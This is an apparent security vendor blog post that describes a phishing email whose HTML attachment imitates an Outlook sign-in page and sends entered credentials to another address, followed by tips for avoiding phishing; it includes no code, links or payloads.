Analyzing an Outlook phishing attack

by MalwareSecurity Research & AnalysisThreat AnalysisWeb Security

It is in my routine to read emails before starting my daily work while enjoying my cup of coffee. While browsing for important emails I need to separate spam emails from legitimate emails and analyze the spam emails. I was trying to sort out the spam emails when I came across an odd email that looks old:

At first I thought the old “DHL” and “tracking” malwares have risen – compliments of the Trojan Bredolab, so I decided to prioritized this specific email. I took the sample into a controlled environment and tried to open the HTML attachment to monitor the behavior. After double clicking the attachment the following scripting message showed up:

For me to monitor the behavior further I clicked “OK” and proceeded and was shown the following page:

The page shown above looks legitimate for unsuspecting users. They may interpret the page to be from the Internet but it is actually from the local machine where the HTML file was opened.

As seen in this page, it is very obvious that this phishing email targets Outlook accounts. Once the unsuspecting user enters their email credentials and clicks the “Sign in” button their account credentials will be sent to another address as shown by the source code of the page below:

Investigating further the link where the email credentials will be sent shows the following robots.txt description about the link:

This specific phishing malware is detected by CYREN as HTML/Phish.BN.

Malware authors have devised several methods of identity theft. The most common method of phishing is by exploiting the weakest link in the security chain via social engineering – the human users. Malware authors can easily create fake pages or emails that look very similar to the original ones and then spam them out. Knowledgeable users who receive such spam emails, of course, would just ignore them. But the author’s targets are users who lack knowledge about Internet security.

Because phishing is one of the most devious forms of identity theft, it is important for users to learn how to protect themselves against phishing attacks. Below are some tips to avoid identity theft:

  1. Be wary of emails that:
      1. come from unrecognized senders.
      2. that ask you to confirm personal or financial information over the internet.
      3. are not personalized.
      4. try to upset you and threatens you with frightening information
      5. have links in emails that ask for personal information
  2. Do not click on links, download files or open attachments in emails from unknown senders.
  3. Never email personal or financial information.
  4. Beware of pop-ups:
      1. Do not click on links from pop-up screens
      2. Do not copy web addresses into your browser from pop-ups
      3. Never enter personal information in a pop-up screen
  5. Protect your computer with a firewall and by installing spam filters, anti-virus and anti-spyware software. Update your anti-virus and anti-spyware software definitions regularly to protect you from the latest as well as old threats.

Go back